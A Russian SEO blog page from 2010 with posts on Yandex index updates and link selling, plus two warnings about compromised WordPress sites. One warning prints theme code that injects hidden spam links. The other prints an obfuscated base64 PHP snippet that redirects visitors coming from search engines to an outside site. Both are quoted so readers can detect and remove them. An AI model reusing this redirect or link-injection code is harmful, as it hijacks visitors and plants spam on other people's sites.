30 Апрель 2010

АП базы яндекса

Filed under: Блогинг — Tags: , , — Pion2er @ 10:44

Произошел очередной АП базы Яндекса и он для моего сайта PION.RU прошел очень неудачно, минус 3к страниц из 5к всего. На сеошных форумах люди пишут что у многих такая фигня. Получается либо это кривой АП и все наладится, либо это очередной гребанный фильтр Яши, под который попадают даже нормальные СДЛы. Очень хочется верить, что все выпавшие страницы вернутся обратно в индекс.

29 Апрель 2010

Как Яндекс определяет ГС

Filed under: Блогинг — Tags: , , , , , — Pion2er @ 11:27

После долгих раздумий по этому поводу, мне кажется я понял, а точнее я все больше склоняюсь к версии в которой Яндекс при определении качества сайта полагается на свой Яндекс.Бар. Точнее на статистику посланной Яндекс.Баром. Т.к. при помощи этого “шпиона” на компьютерах пользователей да еще и в самом подходящем месте, а точнее в браузере которым пользователь серфит по сайтам, Яша получает полную информацию о поведении посетителя на сайте: продолжительность прибывания, пути, переходы по страницам, отказы, клики и многое что другое и основываясь на этих человеческих данных Яша выносит приговор! “Казнить нельзя помиловать!”
(далее…)

3 Март 2010

Очередной АП ТИЦ

Filed under: Блогинг — Tags: , , — Pion2er @ 22:44

Произошел очередной АП ТИЦа, на этот раз он не такой плохой как предыдущий. На этом сайте +10 и того 20, жаль только в сапе ссылки на всех страницах уже распроданы, а увеличивать их количество на странице опасно, т.к. возможен вылет из яши и вообще бан, так что лучше не жадничать, а продолжать наращивать тиц на других проектах и просто увеличить цены раза в два.

Кстати этот сайтик с 300 страницами приносит примерно 50 р в день, что в принципе не плохо, я думаю.

Странно, но на других проектах как раз ничего и не приросло, хотя ссылки на для них закупались. Ну может не время еще, поживем увидим.

16 Февраль 2010

Все хотят наебать

Filed under: Блогинг — Tags: , , — Pion2er @ 14:10

Начал добавлять одну площадку в Sape.ru, все шло путем, но пока их робот сканировал страницы и добавлял их себе в базу, обнаружил, что количество внешних ссылок с моего сайта он насчитал на две больше! Внешне на сайте этих ссылок нет, но заглянув в исходники обнаружил пару левых ссылок

<a href="http://maqe.ru" class="xl">maqe.ru</a> <a href="http://slonovnik.ru" class="xl">slonovnik.ru</a>

В файле стилей я обнаружил код, который скрывает эти ссылки:

a.xl{
    display: none !important;
}

Ну а код, который как раз вставляет эти ссылки в наш блог находился в файле functions.php который лежит в теме нашего сайта и выглядит он так.

function bloqinfo($name = '') {    echo '<a href="http://kinowind.ru" class="xl">kinowind.ru</a> <a href="http://vstorone.ru" class="xl">vstorone.ru</a>'; }
function bloq($name = '') {    echo '<a href="http://maqe.ru" class="xl">maqe.ru</a> <a href="http://slonovnik.ru" class="xl">slonovnik.ru</a>'; }

Конечно весь мусор этот я удалил и теперь доволен. Но совет всем, кто качает бесплатные темы для своих сайтов, обязательно проверяйте их на тему таких вот эксплоитов.

Заломали

Filed under: Блогинг — Tags: , , , — Pion2er @ 12:47

Сегодня у Костика на сайте Steinar.ru обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого “http://magik-tunes.com/?&wmid=112″. Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один из этих сайтов.

Вот код вируса:

<? function _879214760($i){$a=Array('SFRUUF9SRUZFUkVS','aHR0cDovL3J1em9uZXh4eC5jb20vP3VpZD1jN2FjOTA0MDhmZWNlYWNkZDg5MjBkOGZlMmUzNGE0NA==','Z29vZ2xlLnJ1','eWEucnU=','eWFuZGV4LnJ1','bWFpbC5ydQ==','cmFtYmxlcg==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php __0($_SERVER[_879214760(0)],_879214760(1));function __0($_0,$_1){if($_0!=false){$_2=array(_879214760(2),_879214760(3),_879214760(4),_879214760(5),_879214760(6));foreach($_2 as $_3){if(strstr($_0,$_3)){header(_879214760(7) .$_1);die();}}}} ?>

Так что рекомендую всем кто держит сайты проверить файлик header.php на наличие в самом начале подобного текста и если он там, то удалить его. Главный вопрос, который меня мучает – это как им падлам удалось его туда запихнуть? Я понимаю, если бы он не обновлял движок и сидел бы на доисторической версии, но у него установлена самая на сегодня последняя версия WordPress 2.9.1.

Страница 2 из 71234567



  • 220.17 руб. заработано за сутки в бирже ссылок SAPE:
    Место в рейтинге: 119-4
Parthners